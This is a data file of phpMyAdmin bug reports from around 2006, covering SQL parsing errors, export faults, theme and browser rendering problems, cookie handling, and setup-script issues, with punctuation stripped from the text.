According to the download it s release 2.8.1 but on the main screen title and the browser title says phpMyAdmin 2.8.1 rc1 just like the version before this.
You see, these small details are what I call BAD TESTING by the developers.
Original URL https sourceforge.net p phpmyadmin bugs 2152 https sourceforge.net p phpmyadmin bugs 2152 Original author yacar suscri","bug"
"24444","8515","SQL parsing EXTRACT YEAR MONTH.
The query SELECT extract YEAR MONTH FROM visite date ) FROM `u visite` return error 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near YEAR MONTH FROM visite date ) FROM `u visite` WHERE 1 LIMIT 0, 30 at line 1 But this query return good result with mysql command line interface Original URL https sourceforge.net p phpmyadmin bugs 2153 https sourceforge.net p phpmyadmin bugs 2153 Original author freddy78 Found in version 2.8.0.4","bug"
"24444","8516","Request URI Too Large.
Server Apache 2.0.52 Unix) mod ssl 2.0.52 OpenSSL 0.9.7d PHP 5.0.2 Linux 2.6.5 7.108 default Just like in bug 1253125 while executing a large query I am unable to use the Back if given an error) and Edit links, these both generate a Request URI Too Large error.
However, unlike bug 1253125 the Explain SQL, Create PHP Code, and Refresh buttons do work.
Attached is the query I am most recently having this problem with.
Please let me know if you need any further data.
Original URL https sourceforge.net p phpmyadmin bugs 2150 https sourceforge.net p phpmyadmin bugs 2150 Original author flu1d Found in version 2.8.1","bug"
"24444","8517","Search with LIKE on numeric fields failed.
query by example on a numeric field select LIKE from listbox put something like 1 in entry field throws an error Error SQL query Documentation SELECT FROM `elg` WHERE `id` LIKE 1 LIMIT 0 , 50 MySQL said Documentation 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near LIMIT 0, 50 at line 1 tried to enter 1 in entry field Error SQL query Documentation SELECT FROM `elg` WHERE `id` = 1 LIMIT 0 , 50 MySQL said Documentation 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 1 LIMIT 0, 50 at line 1 tried to enter 1 in entry field OK!
SQL Query field shows SELECT FROM `elg` WHERE `id` LIKE 1 LIMIT 0 , 50 Original URL https sourceforge.net p phpmyadmin bugs 2151 https sourceforge.net p phpmyadmin bugs 2151 Original author mandabaer Found in version 2.8.1 rc1","bug"
"24444","8518","most themes buggy.
in almost every theme LeftDisplayServers doesn t fit in alignment and lt;label color black instead of navi color vertical line missing patch see my OldStyle in tracker themes) in detail aqua brushed, dark orange unreadable microscopic) font, especially lt;select option,input CacticaBlues, arctic ocean, Paradice tabs disappear on mouseover white on white, 2.8 too) arctic ocean tabs appear above config.header.inc.php text and top status line Server 127 Database ..., 2.8 too) CacticaBlues db details structure.php tabs broken in IE green xxx, darkblue gray left db list unreadable no contrast ) garvBlue left frame totally broken [ right frame looks nice ) ] Original URL https sourceforge.net p phpmyadmin bugs 2154 https sourceforge.net p phpmyadmin bugs 2154 Original author windkiel Found in version 2.8.2","bug"
"24444","8519","Export DB does not export procedures functions.
Using 5.0.18 and I exported a DB to SQL and it does not dumb stored procedures and or functions for that DB.
I inadevertently restored the DB from the SQL and lost my functions and am having problems finding a copy of them anywhere.
Original URL https sourceforge.net p phpmyadmin bugs 2155 https sourceforge.net p phpmyadmin bugs 2155 Original author majiclab Found in version 2.8.0.3","bug"
"24444","8520","layout broken css) without cookies.
when i disable cookies, the layout original) is broken.
I attached a picture with cookies and without.
Original URL https sourceforge.net p phpmyadmin bugs 2158 https sourceforge.net p phpmyadmin bugs 2158 Original author j a n Found in version 2.8.1","bug"
"24444","8521","CVS link in main.php broken.
CVS link in main.php leads to nowhere i checked pma264,HEAD) Original URL https sourceforge.net p phpmyadmin bugs 2156 https sourceforge.net p phpmyadmin bugs 2156 Original author windkiel","bug"
"24444","8522","table export dump faulty.
here some dumps from a tiny test database irrelevant data removed) pma280 CORRECT phpMyAdmin SQL Dump version 2.8.1 Server version 5.0.21 PHP Version 5.1.4 Table structure for table `te2` CREATE TABLE `te2` `1` text NOT NULL, `a` varchar 255) NOT NULL, KEY `a` `a`), FULLTEXT KEY `1` `1`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; Dumping data for table `te2` INSERT INTO `te2` `1`, `a`) VALUES text1 , aaaa ), test\nfirst , ); pma290 FAULT field 1 instead of `1` import fails ! )
phpMyAdmin SQL Dump version 2.9.0 dev Server version 5.0.21 PHP Version 5.1.4 Table structure for table te2 CREATE TABLE te2 1 text NOT NULL, a varchar 255) NOT NULL, KEY a a), FULLTEXT KEY 1 1) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; Dumping data for table te2 INSERT INTO te2 1, a) VALUES text1 , aaaa ), test\nfirst , ); pma264 CORRECT pma281 xml not possible ) lt;?xml version= 1.0 encoding= utf 8 ?
gt; lt;!
phpMyAdmin XML Dump version 2.6.4 pl4 http www.phpmyadmin.net Server version 5.0.21 PHP Version 5.1.4 gt; lt;!
Database `test` gt; lt;test gt; lt;!
Table te2 gt; lt;te2 gt; lt;1 gt;text1 lt; 1 gt; lt;a gt;aaaa lt; a gt; lt; te2 gt; lt;te2 gt; lt;1 gt;test first lt; 1 gt; lt;a gt; lt; a gt; lt; te2 gt; lt; test gt; pma290 FAULT structure data missing lt;?xml version= 1.0 encoding= utf 8 ?
gt; lt;!
phpMyAdmin XML Dump version 2.9.0 dev Server version 5.0.21 PHP Version 5.1.4 gt; lt;!
Database test gt; lt;test gt; lt; test gt; pma290 export to file CSV for MS Excel writes te2.xls Stylesheet file !)
text1 , aaaa test first , ending with comma !?
Original URL https sourceforge.net p phpmyadmin bugs 2157 https sourceforge.net p phpmyadmin bugs 2157 Original author windkiel Found in version Latest Git","bug"
"24444","8523","Incorrect Inserted Rows Reported With REPLACE INTO.
When doing a REPLACE INTO query that replaces 1 record, it reports that 2 rows were inserted.
My guess is that it does a mysql affected rows ) after the query which is probably reporting both the DELETE and INSERT from the query.
Offending Query REPLACE INTO incoming google first name, last name, phone, email ) VALUES Brandon , Stoner , 555 555 5555 , fake email.com ) phpMyAdmin Output Inserted rows 2 Inserted row id 4 Query took 0.0062 sec) System Infos Probably Not Important) Web Server Apache 2.0.55 Win32) PHP 4.4.2 Win32) Database Server MySQL 4.1.12 CentOS) Client Firefox 1.5.0.3 Win32) Original URL https sourceforge.net p phpmyadmin bugs 2162 https sourceforge.net p phpmyadmin bugs 2162 Original author skwashy Found in version 2.8.0.4","bug"
"24444","8524","Print view not consistant with web view following Optimize.
I used the Check All tables) link on the Structure tab for one of my databases, then ran Optimize from the drop down select box.
The results were displayed on screen but some error) messages were truncated.
I clicked the Print view with full texts) link.
The print view did not show the same output as the previous web view) page.
I suspect the optimize command was run a second time, thus resulting in a different result messages ie.
becuase a lot of tables had already just been optimized).
Original URL https sourceforge.net p phpmyadmin bugs 2159 https sourceforge.net p phpmyadmin bugs 2159 Original author jamesarobertson Found in version 2.6.2","bug"
"24444","8525","Bug in the left frame DB separator.
In phpMyAdmin 2.8.1, if I have these databases portail v2 portail parrainage There will be presented if LeftFrameDBSeparator is set) as follow portail parrainage v2 It s good.
Now I add portail diffusion mails, phpMyAdmin will show in left frame portail diffusion mails portail parrainage v2 instead of portail diffusion mails parrainage v2 The bug is in libraries common.lib.php file, line 126 pos = strrpos db, GLOBALS[ cfg ][ LeftFrameDBSeparator ]); which must be replaced by pos = strpos db, GLOBALS[ cfg ][ LeftFrameDBSeparator ]); Have a nice day Sylvain Original URL https sourceforge.net p phpmyadmin bugs 2160 https sourceforge.net p phpmyadmin bugs 2160 Original author sylvain59 Found in version 2.8.1","bug"
"24444","8526","Wrong primary key used results with subquery).
I had a child table that I wanted to add a foreign key to.
It told me there was a missing row in the parent table so I went about with a query that selected all child items where the parent row does not exist, and then I wanted to manually delete each row CREATE TABLE `parent` `id` INT UNSIGNED NOT NULL AUTO INCREMENT PRIMARY KEY , `test` VARCHAR 50 ) NOT NULL ) ENGINE = MYISAM ; CREATE TABLE `child` `parent id` INT UNSIGNED NOT NULL , `id` INT UNSIGNED NOT NULL , PRIMARY KEY `parent id` , `id` ) ) ENGINE = MYISAM ; INSERT INTO `child` `parent id` , `id` ) VALUES 1 , 1 ); select from child where not exists select id from parent where child.parent id = parent.id); When I run the last query in the SQL tab, I get the one row, as expected.
However, if I try to delete that row from the results, it gives me this error SQL query DELETE FROM `parent` WHERE `parent id` =1 AND `id` =1 LIMIT 1 MySQL said Documentation 1054 Unknown column parent id in where clause Another thing I noticed, when I run the select query, the table at the top like the current active table in PMA) changes to parent instead of whatever other table might have been active at the time, so obviously it has something to do with the SQL parser or whatever, although the symptoms of it are that it assumes the primary key of the results is a different table than it really is...
Original URL https sourceforge.net p phpmyadmin bugs 2161 https sourceforge.net p phpmyadmin bugs 2161 Original author majiclab Found in version 2.8.0.3","bug"
"24444","8527","Documentation and FAQ not reachable.
Hi, the main documentation on http www.phpmyadmin.net documentation and the faq are not reachable!
Original URL https sourceforge.net p phpmyadmin bugs 2163 https sourceforge.net p phpmyadmin bugs 2163 Original author datz","bug"
"24444","8528","possible user password disclosure.
We have 2 virtual hosts configured at the same server one with and one without SSL, both containing the same version of PMA pointing to the same directory).
It s for users that can decide if they want need SSL or not, e.g.
when using different usernames or logging from different hosts.
1\.
User logs on to non SSL ed PMA and then logs out.
2\.
User tries to log in on to the SSL ed PMA, without restarting browser.
It does not matter if s)he tried to use the same username.
3\.
After entering user password, PMA redirects user to non SSL ed PMA login page without any comment user gets back to the login page, but without SSL.
=== If the user does NOT notice that s)he was redirected to non encrypted page, s)he may try to resend the login password which may lead to its disclosure!
=== The login to SSL ed PMA is in this case successfull when user again types the URI of SSL ed PMA, s)he get s in.
This only happens when user log in without SSL and THEN with SSL, without restarting browser.
I found out that removing the phpMyAdmin cookie after logging out of non SSL ed host and before logging to SSL ed host causes this problem not to appear.
This problem did not appear in PMA 2.6.2 Original URL https sourceforge.net p phpmyadmin bugs 2164 https sourceforge.net p phpmyadmin bugs 2164 Original author fanto666","bug"
"24444","8529","undef.
func.
PMA isSuperuser ) if ServerDefault=0.
Fatal error Call to undefined function PMA isSuperuser ) in D \HTdocs\phpMyAdmin HEAD 20060606 022002\libraries\header.inc.php on line 53 v 2.11 2006 04 27 is ok) Original URL https sourceforge.net p phpmyadmin bugs 2165 https sourceforge.net p phpmyadmin bugs 2165 Original author windkiel Found in version Latest Git","bug"
"24444","8530","No warning when deleting everything.
Open the application Choose any database and click on the SQL tab put delete from tablename where 369 any positive integer here) the table was truncated without any warning The sql query is a misspelled version of delete from tablename where id = 369 phpmyadmin version 2.8.0.3 browser firefox 1.5.0.4 on WinXP server os server unknown Original URL https sourceforge.net p phpmyadmin bugs 2166 https sourceforge.net p phpmyadmin bugs 2166 Original author rodrigonishino Found in version 2.8.0.3","bug"
"24444","8531","PDF export problem.. phpMyAdmin V2.8.1 Apache V2.0.54 PHP V5.0.4 MySQL V4.1.18 standard Firefox 1.5.0.4 When I try to export tables to PDF the resulting PDF file is corrupt.
Adobe acrobat 7 will repair the file but only show one page.
Cannot attach a sample as even ziped still to big.
Original URL https sourceforge.net p phpmyadmin bugs 2167 https sourceforge.net p phpmyadmin bugs 2167 Original author ughnz Found in version 2.8.1","bug"
"24444","8532","Theme Style cannot be changed.
Hi there, after first change of Theme Style it can t be changed until next start of PHPMYADMIN session close and open Explorer Mozilla).
After first change, the pull down menu contains only selected theme, but two times to same... Like Original Original Original URL https sourceforge.net p phpmyadmin bugs 2168 https sourceforge.net p phpmyadmin bugs 2168 Original author ochm","bug"
"24444","8533","XML export option missing.
Missing XML export option when exporting for a db or a table.
Original URL https sourceforge.net p phpmyadmin bugs 2176 https sourceforge.net p phpmyadmin bugs 2176 Original author lem9 Found in version 2.8.1","bug"
"24444","8534","using named pipes displays wrong connection error.
when configured using named pipes in phpMyAdmin and auth method http cfg[ Servers ][ i][ auth type ] = http ; cfg[ Servers ][ i][ host ] = .
; phpMyAdmin does not display connection problem for not extisting named pipe, with auth method config the correct error message is displayed 2017 Can t open named pipe to host .
pipe MySQL 2) and the page title is Access denied but should be Acces not possible or something like this solution display error for missing named pipe Original URL https sourceforge.net p phpmyadmin bugs 2169 https sourceforge.net p phpmyadmin bugs 2169 Original author cybot tm","bug"
"24444","8535","language select cookie pma lang incompatible.
After upgrading from version 2.6.1 to 2.8.1, it is not possible to change the language.
It seems to that there is a wrong other cookie path in the pma lang cookie.
2.8.1 sets the cookie path with a trailing slash, 2.6.1 doesn t. So, there were two cookies named pma lang existing.
For each request, the older cookie were sent to the server.
After deleting the older one, language selection worked fine.
Original URL https sourceforge.net p phpmyadmin bugs 2170 https sourceforge.net p phpmyadmin bugs 2170 Original author andi10 Found in version 2.8.1","bug"
"24444","8536","Theme dropdown is broken.
.if you choose in version 2.8.1 a design, the previously chosen design s name in the dropdown menue changes to the name of the currently selected design.
if you go on changing the design, in the end there are as many rows in the dropdown as you have designs, but the names are all the same and the choice of every name selects the exactly same design, especially the last on that was chosen.
that s not nice Original URL https sourceforge.net p phpmyadmin bugs 2171 https sourceforge.net p phpmyadmin bugs 2171 Original author jack 71 Found in version 2.8.1","bug"
"24444","8537","Config needs to be reread after change.
I have am using 2.7.x and am fairly experienced with installing PMA and mysql.
I cannot get connected useing PMA 2.8.1 but 2.7.0 works fine to my server.
The config.inc.php is set to connect to a ssl web server that then connect to the mysql server on another system.
That is I am not using local sockets but the tcp connection method.
I modified the libraries config.default.php file and copied to the top level directory as config.inc.php.
I used the same settings for the host, control user etc.
that I normally use.
When I try to connect I get the famous MySQL said Documentation 2002 The server is not responding or the local MySQL server s socket is not correctly configured) But I am not using sockets.
If I remove the config.inc.php file I get the same error.
It is like my config.inc.php is not being read.
I took a look at where it is being read and it appears libraries common.lib.php is where this is done.
The method for reading the config file is different from 2.7.0.
I put some echo statements in common.lib.php and it appears it is not being read at SESSION[ PMA Config ] = new PMA Config .
config.inc.php ); My control user can connect from the web server to the mysql server using the mysql client and as I said PMA 2.7.0 is working fine.
I also tried the new setup.php and created a basic config.inc.php file shown below, note I for the contol user name passwd.
I have spent several hours on this and would appreciate some help.
Thank you.
lt;?php Generated configuration file Generated by phpMyAdmin 2.8.1 setup script by Michal Cihar lt;michal cihar.com gt; Version Id setup.php,v 1.23.2.8.2.2 2006 05 15 07 57 09 nijel Exp Date Wed, 14 Jun 2006 13 27 14 GMT Servers configuration i = 0; Server classroom.cs.unc.edu cookie) [1] i ; cfg[ Servers ][ i][ host ] = classroom.cs.unc.edu ; cfg[ Servers ][ i][ extension ] = mysql ; cfg[ Servers ][ i][ connect type ] = tcp ; cfg[ Servers ][ i][ compress ] = false; cfg[ Servers ][ i][ controluser ] = ; cfg[ Servers ][ i][ controlpass ] = ; cfg[ Servers ][ i][ auth type ] = cookie ; End of servers configuration cfg[ blowfish secret ] = 44900e4bbafa12.68607325 ; ?
gt; Original URL https sourceforge.net p phpmyadmin bugs 2172 https sourceforge.net p phpmyadmin bugs 2172 Original author jwsopko","bug"
"24444","8538","setup.php generates error with PHP 4.1.2.
The documentation for phpmyadmin 2.8.1 and other versions, assumedly) states that PHP 4.1 or above is required.
However, scripts setup.php uses the PHP function var export ) when saving a generated configuration, which wasn t introduced until PHP 4.2. setup.php is therefore unable to save on my server, which uses PHP 4.1.2.
Either the documentation should be updated to state PHP 4.2, or the setup script should be altered.
I would hope for the latter, so that phpmyadmin is able to remain as backward compatible as possible.
Original URL https sourceforge.net p phpmyadmin bugs 2180 https sourceforge.net p phpmyadmin bugs 2180 Original author cromas Found in version 2.8.1","bug"
"24444","8539","Parse error syntax error in galician iso 8859 1.inc.php.
My first web browser language is galician and phpmyadmin 2.8.0.3 display this, the first time that i open it Parse error syntax error, unexpected T VARIABLE in usr share phpmyadmin lang galician iso 8859 1.inc.php on line 846 I open galician iso 8859 1.inc.php and i see that problem was in line before strStatisticsOverrun = Nun servidor ocupado, os contadores de bytes poden sobrecarregarse, de maneria que esas estatxc3xadsticas, tal e como as transmite o servidor de MySQL, poden resultar incorrectas.
I put the ; at the end, and it works fine.
Original URL https sourceforge.net p phpmyadmin bugs 2173 https sourceforge.net p phpmyadmin bugs 2173 Original author rrdopazo Found in version 2.8.0.3","bug"
"24444","8540","Parse error syntax error in galician utf 8.inc.php.
My first web browser language is galician and phpmyadmin 2.8.0.3 display this, the first time that i open it Parse error syntax error, unexpected T VARIABLE in usr share phpmyadmin lang galician utf 8.inc.php on line 847 I open galician utf 8.inc.php and i see that problem was in line before strStatisticsOverrun = Nun servidor ocupado, os contadores de bytes poden sobrecarregarse, de maneria que esas estatxc3xadsticas, tal e como as transmite o servidor de MySQL, poden resultar incorrectas.
I put the ; at the end, and it works fine.
Original URL https sourceforge.net p phpmyadmin bugs 2174 https sourceforge.net p phpmyadmin bugs 2174 Original author rrdopazo Found in version 2.8.0.3","bug"
"24444","8541","LIMIT should be used when viewing the binary log.
When on the main phpmyadmin page after logging in, the binary log option should limit the number of records returned by using the LIMIT syntax.
SHOW BINLOG EVENTS LIMIT 0,30 Otherwise on a very active survey this page can take a LONG time to load and can cause problems due to the load incurred on the server.
Original URL https sourceforge.net p phpmyadmin bugs 2175 https sourceforge.net p phpmyadmin bugs 2175 Original author urkle Found in version 2.8.1","bug"
"24444","8542","IE 7 Beta 2 Issues.
In any of the SQL boxes if you are using IE7 you won t see the text change as you type.
If you move the mouse either in the text box or out of the text box the text will show up.
I have verified this on 5 different machines running ie7.
The only version this works fine with is IE7 preview.
Beta 1 and Beta 2 both have problems working with all of the sql boxes on phpmyadmin.
Original URL https sourceforge.net p phpmyadmin bugs 2177 https sourceforge.net p phpmyadmin bugs 2177 Original author donsimon","bug"
"24444","8543","Defaulting VARCHAR in MySQL strict mode.
MySQL is causing some problems for me, I create a table with a varchar field that doesn t contain a default, yet is also set to not null).
I do an insert into the table without mentioning the varchar column, MySQL now complains about it not having a default value.
This means I have to manually alter all fields in SQL that I add via PHPMyAdmin so that they default to .
Is there any way PHPMyAdmin could do this automatically?
I am not sure if this is due to PHPMyAdmin dropping the feature or MySQL becoming somehow more strict.
Original URL https sourceforge.net p phpmyadmin bugs 2178 https sourceforge.net p phpmyadmin bugs 2178 Original author ticksoft Found in version 2.8.1","bug"
"24444","8544","Import CSV Optionally enclose fields.
Having trouble importing a csv file created in Excel) into my table using phpMyAdmin version 2.8.
In version 2.6, there was a feature to specify that Fields are terminated by somecharacter on an optional basis .
This feature is no longer there?!
Excel automatically encloses fields with quotes that contain a comma, semicolon, etc.
when saving as a csv file.
Therefore some fields will be enclosed by quotes, others will not.
Since you have no choice to specify that fields are enclosed by quotes optionally anymore, you can no longer import an excel generated csv file.
Am I missing something here?
Is there some other way to import data from Excel to phpMyAdmin?
Otherwise, it surely seems like a major loss to a lot of users...
Original URL https sourceforge.net p phpmyadmin bugs 2179 https sourceforge.net p phpmyadmin bugs 2179 Original author buffaloweb Found in version Latest Git","bug"
"24444","8545","incorectly generated config?.
i just download latest phpMyAdmin 2.8.2 from your site, and i get following error screen..
Welcome to phpMyAdmin 2.8.2 Probably reason of this is that you did not create configuration file.
You might want to use setup script to create one.
Error MySQL said Documentation 1045 Access denied for user root localhost using password NO) Open new phpMyAdmin window i went to setup script and create my config file, here is what i have ... lt;?php Generated configuration file Generated by phpMyAdmin 2.8.2 setup script by Michal xc4x8cihaxc5x99 lt;michal cihar.com gt; Version Id setup.php,v 1.23.2.10 2006 05 15 07 57 30 nijel Exp Date Sat, 08 Jul 2006 23 09 50 GMT Servers configuration i = 0; Server localhost cookie) [1] i ; cfg[ Servers ][ i][ host ] = localhost ; cfg[ Servers ][ i][ extension ] = mysql ; cfg[ Servers ][ i][ connect type ] = tcp ; cfg[ Servers ][ i][ compress ] = true; cfg[ Servers ][ i][ auth type ] = cookie ; End of servers configuration cfg[ blowfish secret ] = 44b03b37f258f3.10656204 ; ?
gt; i even checked w my other phpMyAdmin i have same config at my other location, but not with this version of phpMyAdmin and it works fine... either i am doing something wrong or there is obviosly a bug here..
Original URL https sourceforge.net p phpmyadmin bugs 2185 https sourceforge.net p phpmyadmin bugs 2185 Original author a1exus Found in version 2.8.2","bug"
"24444","8546","Problem with CONVERT used on columns.
MySQL 5.0.22 UTF8 database with an index on produkt as well as on nr,produkt,variant,slettet.
phpMyAdmin 2.8.1, PHP 5.1.4 When selecting a row for modification the following SELECT statement is generated.
SELECT FROM `kundeprodukter` WHERE `nr` = 415 AND CONVERT `produkt` USING utf8) = dreier.se AND CONVERT `variant` USING utf8) = registrering AND `slettet` = 0000 00 00 00 00 00 ; This causes a full table scan, whereas SELECT FROM `kundeprodukter` WHERE `nr` =415 AND `produkt` = CONVERT latin1 dreier.se USING utf8 ) AND CONVERT `variant` USING utf8 ) = registrering AND `slettet` = 0000 00 00 00 00 00 will select only the relevant row and not show up in the mysql slow log.
It seems more efficient to convert the data in the query in steadof all column values in the database.
Original URL https sourceforge.net p phpmyadmin bugs 2181 https sourceforge.net p phpmyadmin bugs 2181 Original author joergent","bug"
"24444","8547","IE 6) doesn t show item numbering in documentation.
i often read write see FAQ x.yz in answers to user problems.
now i incidentally found out that my IE6 used by most other users) doesn t show those numbers.
That s not very helpful.
IE view source pma281 lt;a name= faq1 10 gt; lt; a gt; lt;h4 gt; [ lt;a href= faq1 10 gt;1.10 lt; a gt;] ....OK pma290 2006 06 26) lt;h4 id= faq1 10 gt; lt;a href= faq1 10 gt;I m hav .. NOT OK Original URL https sourceforge.net p phpmyadmin bugs 2182 https sourceforge.net p phpmyadmin bugs 2182 Original author windkiel Found in version Latest Git snapshot","bug"
"24444","8548","CSS not loaded correctly IE).
CSS stylesheets are not loaded properly, only after refresh the php css is loaded.
WinXP sp2, IE 6).
I encountered the same problem before and had to build something that dynamically created a physical .css file and then changing the stylesheet loading from lt;link rel= stylesheet type= text css href= .
css phpmyadmin.css.php?
token=6371de16b8cce104f1ff0ffb769e79a7 amp;amp;js frame=rig ht gt; to lt;link rel= stylesheet type= text css href= .
css phpmyadmin.css?
token=6371de16b8cce104f1ff0ffb769e79a7 amp;amp;js frame=rig ht gt; Original URL https sourceforge.net p phpmyadmin bugs 2183 https sourceforge.net p phpmyadmin bugs 2183 Original author thijszoon Found in version 2.8.2","bug"
"24444","8549","information schema disables table size.
that s a weird problem.
i use a drop down menu on the left for the database list.
everytime i select the information schema database, wait for the table list to finish and afterwards select any other database from the drop down menu, the Size column is missing on the overview page where all tables of the selected database are listed).
nothing really BAD but it s a pain in the arse after a while ) Original URL https sourceforge.net p phpmyadmin bugs 2184 https sourceforge.net p phpmyadmin bugs 2184 Original author em gotcha Found in version 2.8.2","bug"
"24444","8550","Db Structure, with selected...print view.
This problem might could be classified as a navigation error but it seems that it is more than simply navigation.)
For phpMyAdmin 2.8.2 when on the DB Structure tab with table view of all database tables) if one or more tables are selected and Print View is chosen from the With selected... dropdown field that is below the list of tables, instead of printing the selected table views I get taken to the SQL tab.
I have to go to each individual table and click the Print View link to get all of the views printed.
Original URL https sourceforge.net p phpmyadmin bugs 2190 https sourceforge.net p phpmyadmin bugs 2190 Original author plogan73 Found in version 2.8.2","bug"
"24444","8551","Cannot Log Out first click).
This is one of those things that causes a lot of head scratching, so I ll keep it rudimentary... ) I m using cookie auth with PMA 2.8.2 on a SSL connection.
I ve been using this cookie auth SSL combination for a long time, through many versions of PMA, so this isn t anything new to me, e.g.
an experiment.
The only difference is I m running 2.8.2 now.
The problem seems to be, whenever I perform certain functions in PMA not sure which ones trigger this yet), the log out URI changes.
When I try to log out by clicking the log out icon top of left panel), it simple takes me back to the PMA home screen.
Once I m back to the home screen, then I can log out by clicking the log out icon left panel) a second time, or the text link main panel).
If you MouseOver the log out icon and look at the address in your browser s Status Bar, while you re working, you can see that the log out URI sometimes changes, for instance, including the name of the db you were last working on.
Example taken from my browser history) https secure23.example.com example phpMyAdmin index.php?db=example roundcubemail token=f72ff5a1a7798cf24d0e0a45665b7f05 old usr=example The URI to log out should have been https secure23.example.com example phpMyAdmin index.php?token=f72ff5a1a7798cf24d0e0a45665b7f05 old usr=example Bottom line It sometimes takes two clicks to log out of PMA now, depending on what you re doing.
Original URL https sourceforge.net p phpmyadmin bugs 2186 https sourceforge.net p phpmyadmin bugs 2186 Original author vindsl Found in version 2.8.2","bug"
"24444","8552","imagelink error.
When using imagelink transformation and string is too long then a link and image src are broken.
It contains only few chars and a triple dot.
It is all right for visible texts, but links and images must rest unmodified.
When I switch to full texts, than it is ok.
Original URL https sourceforge.net p phpmyadmin bugs 2187 https sourceforge.net p phpmyadmin bugs 2187 Original author znec Found in version 2.8.2","bug"
"24444","8553","pow int,int) may overflow on php alpha osf.
I m a complete newbie to php, so don t kill me if it s totally wrong .
libraries common.lib.php has several pow 1000,8) or one pow 1024,8) which fail do switch to float on integer overflow at least on alpha osf4.0 with php 4.4.0).
The fix would be to force pow ) to return float by adding .0 to the ints.
sample php code lt;?php echo pow ) overflow lt;br gt; ; echo pow 1,8) = .
pow 1,8) .
lt;br gt; ; echo pow 10,8) = .
pow 10,8) .
lt;br gt; ; echo pow 100,8) = .
pow 100,8) .
lt;br gt; ; echo pow 1000,8) = .
pow 1000,8) .
lt;br gt; ; echo pow 1.0,8) = .
pow 1.0,8) .
lt;br gt; ; echo pow 10.0,8) = .
pow 10.0,8) .
lt;br gt; ; echo pow 100.0,8) = .
pow 100.0,8) .
lt;br gt; ; echo pow 1000.0,8) = .
pow 1000.0,8) .
lt;br gt; ; ?
gt; diffs for fix in .
libraries common.lib.
php diff r1.1 libraries common.lib.php 1797c1797 lt; value = round value pow 1024, d) dh)) dh; gt; value = round value pow 1024.0, d) dh)) dh; 1886,1887c1886,1887 lt; if isset units[ d]) value gt;= li pow 1000, d 1)) \{ lt; value = round value pow 1000, d) dh)) dh; gt; if isset units[ d]) value gt;= li pow 1000.0, d 1)) \{ gt; value = round value pow 1000.0, d) dh)) dh; 1894,1895c1894,1895 lt; if isset units[ d]) value lt;= li pow 1000, d 1)) \{ lt; value = round value pow 1000, d) dh)) dh; gt; if isset units[ d]) value lt;= li pow 1000.0, d 1)) \{ gt; value = round value pow 1000.0, d) dh)) dh; Original URL https sourceforge.net p phpmyadmin bugs 2188 https sourceforge.net p phpmyadmin bugs 2188 Original author wwwutz Found in version 2.8.2","bug"
"24444","8554","[CSS] Actions tabs not stylled in Opera 9.
I see only plain list instead of tabs like in Firefox.
See attached srceenshot.
Opera 9 phpMyAdmin 2.8.1 Original URL https sourceforge.net p phpmyadmin bugs 2189 https sourceforge.net p phpmyadmin bugs 2189 Original author oswaldcz","bug"
"24444","8555","Edit next row and mysqli.
When using the Edit next row dropdown for sequential editing of the next PK, with mysqli I get SHOW TABLE STATUS LIKE tablename ; 2014 Commands out of sync; you can t run this command now Works correctly with mysql extension.
Original URL https sourceforge.net p phpmyadmin bugs 2191 https sourceforge.net p phpmyadmin bugs 2191 Original author lem9 Found in version 2.8.2","bug"
"24444","8556","After Edit Record link to previous page not working.
When you want to edit a record in the INSERT TAB and choose the option SAVE and Go back to previous page the windows does not refresh or link to previous page is not working and frame stays blank.
IIS 5.0 Server PHP 4.4.2 MYSQL 5.0.22 PHPMYADMIN 2.8.2 Original URL https sourceforge.net p phpmyadmin bugs 2192 https sourceforge.net p phpmyadmin bugs 2192 Original author dsusa21 Found in version 2.8.2","bug"
"24444","8557","bigint auto increment result error.
if my pk auto increment id use bigint 20),and i insert a new record,then the auto increment id result is error.
because the php function mysql insert id not support bigint,you need to use mysql query SELECT LAST INSERT ID ); .
you can see these description in mysql and php manual.
sorry for my poor english.
Original URL https sourceforge.net p phpmyadmin bugs 2193 https sourceforge.net p phpmyadmin bugs 2193 Original author godamen Found in version 2.6.4 pl4","bug"
"24444","8558","make warning about row count more visible.
i have a following query [code] SELECT p.product id, p.product name, r.report value FROM products p LEFT JOIN reports r ON r.product id=p.product id ; [ code] that returns no error and actually returns 19 valid rows.
the problem is that PMA shows this Showing rows 0 0 1 total, Query took 0.0012 sec) i changed the query to look like this [code] SELECT p.product id, p.product name, r.report value FROM products p, reports r WHERE r.product id=p.product id ; [ code] that returns 17 valid rows but PMA still shows the same message.
it seems to me like there is something wrong with the result rows count when it comes from mutiple tables.
Original URL https sourceforge.net p phpmyadmin bugs 2194 https sourceforge.net p phpmyadmin bugs 2194 Original author shylauda69 Found in version 2.8.2","bug"
"24444","8559","No page selector in foreign key browse page.
The count of total rows is not done correctly, so the page number selector is missing.
Original URL https sourceforge.net p phpmyadmin bugs 2198 https sourceforge.net p phpmyadmin bugs 2198 Original author lem9 Found in version 2.8.2","bug"
"24444","8560","blank page after edit in IE6 via W2K3.
Consistently receive a blank page in the right frame after submitting a record update to a single selected record.
Setup Server IIS under Windows 2003 Server Latest patched IE6 under either Windows 2000 Pro or Windows XP Home phpMyAdmin gt; 2.8.0.4 I ve replicated the problem with every version of phpMyAdmin AFTER 2.8.0.4, including a current CVS snapshot.
Firefox, Mozilla, Opera all operate as expected perform a redirect to the previous page ) in the exact same situation.
Other important settings cookie auth, mysqli or mysql, php 5.1.4, mysql 4.1.20 Config file PHP contents can be as simple as this i = 0; i ; cfg[ Servers ][ i][ host ] = localhost ; cfg[ Servers ][ i][ connect type ] = tcp ; cfg[ Servers ][ i][ extension ] = mysqli ; cfg[ Servers ][ i][ compress ] = false; cfg[ Servers ][ i][ auth type ] = cookie ; cfg[ blowfish secret ] = secret goes here ; To replicate Use IE6.
Login, select a database, pick a table with a field that has over 15 fields and one of them with a value defaulting to NOW.
Click the pencil icon on the record.
Ensure that save and go back to previous page are selected.
Click Go.
The update DOES get performed, but the previous page does not load, resulting in a funky looking blank page.
Apparently, the code sent to the browser in this situation with tbl replace.php result is different for IIS IE6 combinations, as it doesn t include a refresh header nor a location header, nor any other method of forcing a redirect to the previous page.
I ve attached a slightly munged source url and token changed) of what DOES get sent to IE6 during this request.
Note that the db and table values are empty, no meta refresh call, and there is no JS call to actually bump a redirect within the single script file referenced .
